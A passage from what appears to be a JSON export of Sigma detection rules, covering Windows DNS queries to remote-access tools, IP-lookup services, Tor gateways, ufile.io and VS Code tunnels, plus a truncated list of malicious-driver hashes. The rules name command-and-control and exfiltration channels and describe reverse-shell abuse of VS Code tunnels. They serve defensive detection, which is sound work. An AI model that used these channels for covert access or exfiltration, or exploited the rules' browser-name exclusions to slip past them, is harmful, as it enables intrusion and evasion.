'netsupportsoftware.com' # For NetSupport Manager RAT\n            - 'parsecusercontent.com'\n            - 'pubsub.atera.com'\n            - 'relay.kaseya.net'\n            - 'relay.screenconnect.com'\n            - 'relay.splashtop.com'\n            - 'remoteassistance.support.services.microsoft.com' # Quick Assist Application\n            - 'remotedesktop-pa.googleapis.com'\n            - 'remoteutilities.com' # Usage of Remote Utilities RAT\n            - 'secure.logmeinrescue.com'\n            - 'services.vnc.com'\n            - 'static.remotepc.com'\n            - 'swi-rc.com'\n            - 'swi-tc.com'\n            - 'tailscale.com' # Scattered Spider threat group used this RMM tool\n            - 'telemetry.servers.qetqo.com'\n            - 'tmate.io'\n            - 'twingate.com'  # Scattered Spider threat group used this RMM tool\n            - 'zohoassist.com'\n    selection_rustdesk:  # https://twitter.com/malmoeb/status/1668504345132822531?s=20 and https://www.adamsdesk.com/posts/rustdesk-not-connecting/ mention this pattern\n        QueryName|endswith: '.rustdesk.com'\n        QueryName|startswith: 'rs-'\n    # Exclude browsers for legitimate visits of the domains mentioned above\n    # Add missing browsers you use and exclude the ones you don't\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_defender:\n        Image|endswith:\n            - '\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n    filter_optional_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_optional_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    filter_optional_tor:\n        Image|contains: '\\Tor Browser\\'\n    filter_optional_whaterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_optional_midori:\n        Image|contains: '\\AppData\\Local\\Programs\\midori-ng\\'\n        Image|endswith: '\\Midori Next Generation.exe'\n    filter_optional_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        Image|endswith: '\\slimbrowser.exe'\n    filter_optional_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: '\\Flock.exe'\n    filter_optional_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_optional_falkon:\n        Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_optional_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely with other browser software. Apply additional filters for any other browsers you might use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml",
    "content": "title: Suspicious DNS Query for IP Lookup Service APIs\nid: ec82e2a5-81ea-4211-a1f8-37a0286df2c2\nstatus: test\ndescription: Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.\nreferences:\n    - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon\n    - https://twitter.com/neonprimetime/status/1436376497980428318\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Brandon George (blog post), Thomas Patzke\ndate: 2021-07-08\nmodified: 2024-03-22\ntags:\n    - attack.reconnaissance\n    - attack.t1590\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        - QueryName:\n              - 'www.ip.cn'\n              - 'l2.io'\n        - QueryName|contains:\n              - 'api.2ip.ua'\n              - 'api.bigdatacloud.net'\n              - 'api.ipify.org'\n              - 'bot.whatismyipaddress.com'\n              - 'canireachthe.net'\n              - 'checkip.amazonaws.com'\n              - 'checkip.dyndns.org'\n              - 'curlmyip.com'\n              - 'db-ip.com'\n              - 'edns.ip-api.com'\n              - 'eth0.me'\n              - 'freegeoip.app'\n              - 'geoipy.com'\n              - 'getip.pro'\n              - 'icanhazip.com'\n              - 'ident.me'\n              - 'ifconfig.io'\n              - 'ifconfig.me'\n              - 'ip-api.com'\n              - 'ip.360.cn'\n              - 'ip.anysrc.net'\n              - 'ip.taobao.com'\n              - 'ip.tyk.nu'\n              - 'ipaddressworld.com'\n              - 'ipapi.co'\n              - 'ipconfig.io'\n              - 'ipecho.net'\n              - 'ipinfo.io'\n              - 'ipip.net'\n              - 'ipof.in'\n              - 'ipv4.icanhazip.com'\n              - 'ipv4bot.whatismyipaddress.com'\n              - 'ipv6-test.com'\n              - 'ipwho.is'\n              - 'jsonip.com'\n              - 'myexternalip.com'\n              - 'seeip.org'\n              - 'wgetip.com'\n              - 'whatismyip.akamai.com'\n              - 'whois.pconline.com.cn'\n              - 'wtfismyip.com'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate usage of IP lookup services such as ipify API\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml",
    "content": "title: TeamViewer Domain Query By Non-TeamViewer Application\nid: 778ba9a8-45e4-4b80-8e3e-34a419f0b85e\nstatus: test\ndescription: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)\nreferences:\n    - https://www.teamviewer.com/en-us/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-30\nmodified: 2023-09-18\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName:\n            - 'taf.teamviewer.com'\n            - 'udp.ping.teamviewer.com'\n    filter_main_teamviewer:\n        # Note: To avoid evasion based on similar names. Best add full install location of TeamViewer\n        Image|contains: 'TeamViewer'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown binary names of TeamViewer\n    - Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml",
    "content": "title: DNS Query Tor .Onion Address - Sysmon\nid: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544\nrelated:\n    - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2\n      type: similar\n    - id: a8322756-015c-42e7-afb1-436e85ed3ff5\n      type: similar\nstatus: test\ndescription: Detects DNS queries to an \".onion\" address related to Tor routing networks\nreferences:\n    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nauthor: frack113\ndate: 2022-02-20\nmodified: 2025-09-12\ntags:\n    - attack.command-and-control\n    - attack.t1090.003\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|endswith:\n            - '.hiddenservice.net'\n            - '.onion.ca'\n            - '.onion.cab'\n            - '.onion.casa'\n            - '.onion.city'\n            - '.onion.direct'\n            - '.onion.dog'\n            - '.onion.glass'\n            - '.onion.gq'\n            - '.onion.ink'\n            - '.onion.it'\n            - '.onion.link'\n            - '.onion.lt'\n            - '.onion.lu'\n            - '.onion.nu'\n            - '.onion.pet'\n            - '.onion.plus'\n            - '.onion.rip'\n            - '.onion.sh'\n            - '.onion.to'\n            - '.onion.top'\n            - '.onion'\n            - '.s1.tor-gateways.de'\n            - '.s2.tor-gateways.de'\n            - '.s3.tor-gateways.de'\n            - '.s4.tor-gateways.de'\n            - '.s5.tor-gateways.de'\n            - '.t2w.pw'\n            - '.tor2web.ae.org'\n            - '.tor2web.blutmagie.de'\n            - '.tor2web.com'\n            - '.tor2web.fi'\n            - '.tor2web.io'\n            - '.tor2web.org'\n            - '.tor2web.xyz'\n            - '.torlink.co'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_ufile_io_query.yml",
    "content": "title: DNS Query To Ufile.io\nid: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b\nrelated:\n    - id: 090ffaad-c01a-4879-850c-6d57da98452d\n      type: similar\nstatus: test\ndescription: Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\nauthor: yatinwad, TheDFIRReport\ndate: 2022-06-23\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: 'ufile.io'\n    condition: selection\nfalsepositives:\n    - DNS queries for \"ufile\" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml",
    "content": "title: DNS Query To Visual Studio Code Tunnels Domain\nid: b3e6418f-7c7a-4fad-993a-93b65027a9f1\nrelated:\n    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels\n      type: similar\n    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode\n      type: similar\n    - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels\n      type: similar\nstatus: test\ndescription: |\n    Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://cydefops.com/vscode-data-exfiltration\nauthor: citron_ninja\ndate: 2023-10-25\nmodified: 2023-11-20\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|endswith: '.tunnels.api.visualstudio.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_mal_drivers.yml",
    "content": "title: Malicious Driver Load\nid: 05296024-fe8a-4baf-8f3d-9a5f5624ceb2\nstatus: test\ndescription: Detects loading of known malicious drivers via their hash.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-18\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        Hashes|contains:\n            - 'MD5=5be61a24f50eb4c94d98b8a82ef58dcf'\n            - 'MD5=d70a80fc73dd43469934a7b1cc623c76'\n            - 'MD5=3b71eab204a5f7ed77811e41fed73105'\n            - 'MD5=528ce5ce19eb34f401ef024de7ddf222'\n            - 'MD5=ae548418b491cd3f31618eb9e5730973'\n            - 'MD5=72f53f55898548767e0276c472be41e8'\n            - 'MD5=508faa4647f305a97ed7167abc4d1330'\n            - 'MD5=ed2b653d55c03f0bffa250372d682b75'\n            - 'MD5=0d2ba47286f1c68e87622b3a16bf9d92'\n            - 'MD5=3164bd6c12dd0fe1bdf3b833d56323b9'\n            - 'MD5=70fd7209ce5c013a1f9e699b5cc86cdc'\n            - 'MD5=c71be7b112059d2dc84c0f952e04e6cc'\n            - 'MD5=acac842a46f3501fe407b1db1b247a0b'\n            - 'MD5=01c2e4d8234258451083d6ce4e8910b7'\n            - 'MD5=c8541a9cef64589593e999968a0385b9'\n            - 'MD5=e172a38ade3aa0a2bc1bf9604a54a3b5'\n            - 'MD5=6fcf56f6ca3210ec397e55f727353c4a'\n            - 'MD5=2b80be31fbb11d4c1ef6d6a80b2e0c16'\n            - 'MD5=07056573d464b0f5284f7e3acedd4a3f'\n            - 'MD5=c7b7f1edb9bbef174e6506885561d85d'\n            - 'MD5=d5918d735a23f746f0e83f724c4f26e5'\n            - 'MD5=84763d8ca9fe5c3bff9667b2adf667de'\n            - 'MD5=fb593b1f1f80d20fc7f4b818065c64b6'\n            - 'MD5=909f3fc221acbe999483c87d9ead024a'\n            - 'MD5=e29f6311ae87542b3d693c1f38e4e3ad'\n            - 'MD5=aeb0801f22d71c7494e884d914446751'\n            - 'MD5=3f11a94f1ac5efdd19767c6976da9ba4'\n            - 'MD5=be6318413160e589080df02bb3ca6e6a'\n            - 'MD5=0b311af53d2f4f77d30f1aed709db257'\n            - 'MD5=d075d56dfce6b9b13484152b1ef40f93'\n            - 'MD5=27384ec4c634701012a2962c30badad2'\n            - 'MD5=5eb2c576597dd21a6b44557c237cf896'\n            - 'MD5=f56db4eba3829c0918413b5c0b42f00f'\n            - 'MD5=e27b2486aa5c256b662812b465b6036c'\n            - 'MD5=db86dfd7aefbb5be6728a63461b0f5f3'\n            - 'MD5=04a88f5974caa621cee18f34300fc08a'\n            - 'MD5=5129d8fd53d6a4aba81657ab2aa5d243'\n            - 'MD5=cd2c641788d5d125c316ed739c69bb59'\n            - 'MD5=7073cd0085fcba1cd7d3568f9e6d652c'\n            - 'MD5=24f0f2b4b3cdae11de1b81c537df41c7'\n            - 'MD5=88bea56ae9257b40063785cf47546024'\n            - 'MD5=63060b756377fce2ce4ab9d079ca732f'\n            - 'MD5=50b39072d0ee9af5ef4824eca34be6e3'\n            - 'MD5=57c18a8f5d1ba6d015e4d5bc698e3624'\n            - 'MD5=7d26985a5048bad57d9c223362f3d55c'\n            - 'MD5=ba54a0dbe2685e66e21d41b4529b3528'\n            - 'MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11'\n            - 'MD5=b52f51bbe6b49d0b475d943c29c4d4cb'\n            - 'MD5=a837302307dace2a00d07202b661bce2'\n            - 'MD5=78a122d926ccc371d60c861600c310f3'\n            - 'MD5=bdb305aa0806f8b38b7ce43c927fe919'\n            - 'MD5=27053e964667318e1b370150cbca9138'\n            - 'MD5=6a4fbcfb44717eae2145c761c1c99b6a'\n            - 'MD5=d13c1b76b4a1ca3ff5ab63678b51df6d'\n            - 'MD5=6a066d2be83cf83f343d0550b0b8f206'\n            - 'MD5=7108b0d4021af4c41de2c223319cd4c1'\n            - 'MD5=1cd158a64f3d886357535382a6fdad75'\n            - 'MD5=e939448b28a4edc81f1f974cebf6e7d2'\n            - 'MD5=4198d3db44d7c4b3ba9072d258a4fc2d'\n            - 'MD5=4a27a2bdc6fbe39eeec6455fb1e0ef20'\n            - 'MD5=30ca3cc19f001a8f12c619daa8c6b6e3'\n            - 'MD5=fe9004353b25640f6a879e57f07122d7'\n            - 'MD5=06c7fcf3523235cf52b3eee083ec07b2'\n            - 'MD5=364605ad21b9275681cffef607fac273'\n            - 'MD5=968ddb06af90ef83c5f20fbdd4eee62e'\n            - 'MD5=ba50bd645d7c81416bb26a9d39998296'\n            - 'MD5=29e03f4811b64969e48a99300978f58c'\n            - 'MD5=b0770094c3c64250167b55e4db850c04'\n            - 'MD5=40b968ecdbe9e967d92c5da51c390eee'\n            - 'MD5=b6b530dd25c5eb66499968ec82e8791e'\n            - 'MD5=f209cb0e468ca0b76d879859d5c8c54e'\n            - 'MD5=76f8607fc4fb9e828d613a7214436b66'\n            - 'MD5=4b058945c9f2b8d8ebc485add1101ba5'\n            - 'MD5=faae7f5f69fde12303dd1c0c816b72b7'\n            - 'MD5=89d294ef7fefcdf1a6ca0ab96a856f57'\n            - 'MD5=ef0e1725aaf0c6c972593f860531a2ea'\n            - 'MD5=bbdbffebfc753b11897de2da7c9912a5'\n            - 'MD5=5ebfc0af031130ba9de1d5d3275734b3'\n            - 'MD5=22949977ce5cd96ba674b403a9c81285'\n            - 'MD5=77cfd3943cc34d9f5279c330cd8940bc'\n            - 'MD5=311de109df18e485d4a626b5dbe19bc6'\n            - 'MD5=2730cc25ad385acc7213a1261b21c12d'\n            - 'MD5=87dc81ebe85f20c1a7970e495a778e60'\n            - 'MD5=154b45f072fe844676e6970612fd39c7'\n            - 'MD5=5a4fe297c7d42539303137b6d75b150d'\n            - 'MD5=d6a1dd7b2c06f058b408b3613c13d413'\n            - 'MD5=a6e9d6505f6d2326a8a9214667c61c67'\n            - 'MD5=7fad9f2ef803496f482ce4728578a57a'\n            - 'MD5=5076fba3d90e346fd17f78db0a4aa12c'\n            - 'MD5=79df0eabbf2895e4e2dae15a4772868c'\n            - 'MD5=14580bd59c55185115fd3abe73b016a2'\n            - 'MD5=1f2888e57fdd6aee466962c25ba7d62d'\n            - 'MD5=5e9231e85cecfc6141e3644fda12a734'\n            - 'MD5=dc564bac7258e16627b9de0ce39fae25'\n            - 'MD5=4e4c068c06331130334f23957fca9e3c'\n            - 'MD5=1ee9f6326649cd23381eb9d7dfdeddf7'\n            - 'MD5=4e1f656001af3677856f664e96282a6f'\n            - 'MD5=36f44643178c505ea0384e0fb241e904'\n            - 'MD5=6b480fac7caca2f85be9a0cfe79aedfc'\n            - 'MD5=c1ab425977d467b64f437a6c5ad82b44'\n            - 'MD5=fe508caa54ffeb2285d9f00df547fe4a'\n            - 'MD5=d3af70287de8757cebc6f8d45bb21a20'\n            - 'MD5=990b949894b7dc82a8cf1131b063cb1a'\n            - 'MD5=c62209b8a5daf3f32ad876ad6cefda1b'\n            - 'MD5=c159fb0f345a8771e56aab8e16927361'\n            - 'MD5=19b15eeccab0752c6793f782ca665a45'\n            - 'MD5=1d51029dfbd616bf121b40a0d1efeb10'\n            - 'MD5=157a22689629ec876337f5f9409918d5'\n            - 'MD5=3dd829fb27353622eff34be1eabb8f18'\n            - 'MD5=8636fe3724f2bcba9399daffd6ef3c7e'\n            - 'MD5=3d0b3e19262099ade884b75ba86ca7e8'\n            - 'MD5=97539c78d6e2b5356ce79e40bcd4d570'\n            - 'MD5=0308b6888e0f197db6704ca20203eee4'\n            - 'MD5=091a6bd4880048514c5dd3bede15eba5'\n            - 'MD5=7e92f98b809430622b04e88441b2eb04'\n            - 'MD5=bb5bda8889d8d27ef984dbd6ad82c946'\n            - 'MD5=b76aee508f68b5b6dccd6e1f66f4cf8b'\n            - 'MD5=a822b9e6eedf69211013e192967bf523'\n            - 'MD5=df52f8a85eb64bc69039243d9680d8e4'\n            - 'MD5=bfbdea0589fb77c7a7095cf5cd6e8b7a'\n            - 'MD5=44857ca402a15ab51dc5afe47abdfa44'\n            - 'MD5=f9844524fb0009e5b784c21c7bad4220'\n            - 'MD5=d34b218c386bfe8b1f9c941e374418d7'\n            - 'MD5=0ca010a32a9b0aeae1e46d666b83b659'\n            - 'MD5=93496a436c5546156a69deb255a9fed0'\n            - 'MD5=1cd5e231064e03c596e819b6ff48daf9'\n            - 'MD5=70a71fe86df717ac59dbf856d7ac5789'\n            - 'MD5=a33089d4e50f7d2ea8b52ca95d26ebf3'\n            - 'MD5=e0cc9b415d884f85c45be145872892b8'\n            - 'MD5=a42249a046182aaaf3a7a7db98bfa69d'\n            - 'MD5=c5ae6ca044bd03c3506c132b033be1dc'\n            - 'MD5=7ebe606acd81abf1f8cb0767c974164b'\n            - 'MD5=b5dcc869a91efcc6e8ea0c3c07605d63'\n            - 'MD5=62c18d61ed324088f963510bae43b831'\n            - 'MD5=093a2a635c3a27aac50efd6463f4efa1'\n            - 'MD5=28102acca39ad0199f262ba9958be3f4'\n            - 'MD5=650ef9dd70cb192027e536754d6e0f63'\n            - 'MD5=32eb3d2bf2c5b3da2d2a1f20fffbac44'\n            - 'MD5=6771b13a53b9c7449d4891e427735ea2'\n            - 'MD5=072ba2309b825ce1dba37d8d924ea8ed'\n            - 'MD5=2d37d2fb9b9f8ac52bc02cba4487e3cb'\n            - 'MD5=1325ec39e98225e487b40043faee8052'\n            - 'MD5=4484f4007de2c3ee4581a2cff77ca3b4'\n            - 'MD5=a236e7d654cd932b7d11cb604629a2d0'\n            - 'MD5=17509f0a98dc5c5d52c3f9ac1428a21b'\n            - 'MD5=840a5edf2534dd23a082cf7b28cbfc4d'\n            - 'MD5=77a7ed4798d02ef6636cd0fd07fc382a'\n            - 'MD5=a9df5964635ef8bd567ae487c3d214c4'\n            - 'MD5=8b75047199825c8e62fdcc1c915db8bd'\n            - 'MD5=d416494232c4197cb36a914df2e17677'\n            - 'MD5=4cf14a96485a1270fed97bb8000e4f86'\n            - 'MD5=35e512f9bedc89dca5ce81f35820714c'\n            - 'MD5=40f35792e7565aa047796758a3ce1b77'\n            - 'MD5=f7f31bccc9b7b2964ac85106831022b1'\n            - 'MD5=26aedc10d4215ba997495d3a68355f4a'\n            - 'MD5=10f3679384a03cb487bda9621ceb5f90'\n            - 'MD5=80219fb6b5954c33e16bac5ecdac651b'\n            - 'MD5=cee36b5c6362993fa921435979bfbe4a'\n            - 'MD5=e37a08f516b8a7ca64163f5d9e68fe5a'\n            - 'MD5=49518f7375a5f995ebe9423d8f19cfe4'\n            - 'MD5=920df6e42cf91bbe19707f5a86e3c5c5'\n            - 'MD5=2ec877e425bd7eddb663627216e3491e'\n            - 'MD5=550b7991d93534bc510bc4f237155a7a'\n            - 'MD5=98d53f6b3bec0a3417a04fbb9e17fa06'\n            - 'MD5=13a57a4ef721440c7c9208b51f7c05de'\n            - 'MD5=c5fc3605194e033bdf3781ff2adaeb61'\n            - 'MD5=6e625ec04c20a9dbd48c7060efbf5e92'\n            - 'MD5=0b9b78d1281c7d4ab50497cf6ea7452a'\n            - 'MD5=4e906fcb13e2793c98f47291fd69391b'\n            - 'MD5=2bb353891d65c9e267eb98a3a2b694c3'\n            - 'MD5=7d86cdda7f49f91fdb69901a002b34e7'\n            - 'MD5=f69b06ca7c34d16f26ea1c6861edf62a'\n            - 'MD5=ee6b1a79cb6641aa44c762ee90786fe0'\n            - 'MD5=1fc7aeeff3ab19004d2e53eae8160ab1'\n            - 'MD5=24d3ea54f25e32832ac20335a1ce1062'\n            - 'MD5=c94f405c5929cfcccc8ad00b42c95083'\n            - 'MD5=b164daf106566f444dfb280d743bc2f7'\n            - 'MD5=93130909e562925597110a617f05e2a9'\n            - 'MD5=f589d4bf547c140b6ec8a511ea47c658'\n            - 'MD5=bf445ac375977ecf551bc2a912c58e8a'\n            - 'MD5=629ee55e4b5a225d048fbcd5f0a1d18b'\n            - 'MD5=0023ca0ca16a62d93ef51f3df98b2f94'\n            - 'MD5=a3d69c7e24300389b56782aa63b0e357'\n            - 'MD5=cbd8d370462503508e44dba023bdf9bc'\n            - 'MD5=67daa04716803a15fc11c9e353d77c2f'\n            - 'MD5=c9d4214c850e0cedf033dc8f0cd3aace'\n            - 'MD5=bd5b0514f3b40f139d8079138d01b5f6'\n            - 'MD5=19bdd9b799e3c2c54c0d7fff68b31c20'\n            - 'MD5=f242cffd9926c0ccf94af3bf16b6e527'\n            - 'MD5=5aeab9427d85951def146b4c0a44fc63'\n            - 'MD5=40170485cca576adb5266cf5b0d3b0bd'\n            - 'MD5=c277c4386a78fae1b7e17eaecf4f472b'\n            - 'MD5=58c37866cbc3d1338e4fc58ada924ffe'\n            - 'MD5=0f16a43f7989034641fd2de3eb268bf1'\n            - 'MD5=0ae30291c6cbfa7be39320badd6e8de0'\n            - 'MD5=05dd59bd4f175304480affd8f1305c37'\n            - 'MD5=f838f4eb36f1e7036238776c7a70f0b0'\n            - 'MD5=85093bb9f027027c2c61aee50796de30'\n            - 'MD5=ae338d91d1b05a72559b7f6ed717362d'\n            - 'MD5=bd91787b5dcb2189b856804e85dfa1d9'\n            - 'MD5=6b3c1511e12f4d27a4ea3b18020d7b84'\n            - 'MD5=97264fd62d4907bdac917917a07b3b7a'\n            - 'MD5=6ececf26ff8b03ed7ffbddadec9a9dab'\n            - 'MD5=47e6ac52431ca47da17248d80bf71389'\n            - 'MD5=eb57f03b7603f0b235af62e8cd5be8c2'\n            - 'MD5=e1a9aa4c14669b1fb1f67a7266f87e82'\n            - 'MD5=29047f0b7790e524b09a06852d31a117'\n            - 'MD5=4dd6250eb2d368f500949952eb013964'\n            - 'MD5=fb7c61ef427f9b2fdff3574ee6b1819b'\n            - 'MD5=844af8c877f5da723c1b82cf6e213fc1'\n            - 'MD5=e39152eadd76751b1d7485231b280948'\n            - 'MD5=ac6e29f535b2c42999c50d2fc32f2c9c'\n            - 'MD5=2406ea37152d2154be3fef6d69ada2c6'\n            - 'MD5=0ea8389589c603a8b05146bd06020597'\n            - 'MD5=754e21482baf18b8b0ed0f4be462ba03'\n            - 'MD5=c4a517a02ba9f6eac5cf06e3629cc076'\n            - 'MD5=32282e07db321e8d7849f2287bb6a14f'\n            - 'MD5=32b67a6cd6dd998b9f563ed13d54a8bc'\n            - 'MD5=3359e1d4244a7d724949c63e89689ef8'\n            - 'MD5=5917e415a5bf30b3fcbcbcb8a4f20ee0'\n            - 'MD5=0bdd51cc33e88b5265dfb7d88c5dc8d6'\n            - 'MD5=a90236e4962620949b720f647a91f101'\n            - 'MD5=ccde8c94439f9fc9c42761e4b9a23d97'\n            - 'MD5=68caf620ef8deaf06819cf8c80d3367b'\n            - 'MD5=5fec28e8f4f76e5ede24beb32a32b9d7'\n            - 'MD5=e8eac6642b882a6196555539149c73f2'\n            - 'MD5=aa98b95f5cbae8260122de06a215ee10'\n            - 'MD5=a5bcaa2fc87b42e2e5d62a2e5dfcbc80'\n            - 'MD5=abc168fdca7169bf9dc40cec9761018d'\n            - 'MD5=7f9309f5e4defec132b622fadbcad511'\n            - 'MD5=4748696211bd56c2d93c21cab91e82a5'\n            - 'MD5=48394dce30bb8da5ae089cb8f41b86dc'\n            - 'MD5=65f800e1112864bf41eb815649f428d5'\n            - 'MD5=bd25be845c151370ff177509d95d5add'\n            - 'MD5=a37ed7663073319d02f2513575a22995'\n            - 'MD5=2c39f6172fbc967844cac12d7ab2fa55'\n            - 'MD5=491aec2249ad8e2020f9f9b559ab68a8'\n            - 'MD5=1e0eb80347e723fa31fce2abb0301d44'\n            - 'MD5=a26363e7b02b13f2b8d697abb90cd5c3'\n            - 'MD5=4118b86e490aed091b1a219dba45f332'\n            - 'MD5=6d131a7462e568213b44ef69156f10a5'\n            - 'MD5=10c2ea775c9e76e7774ab89e38f38287'\n            - 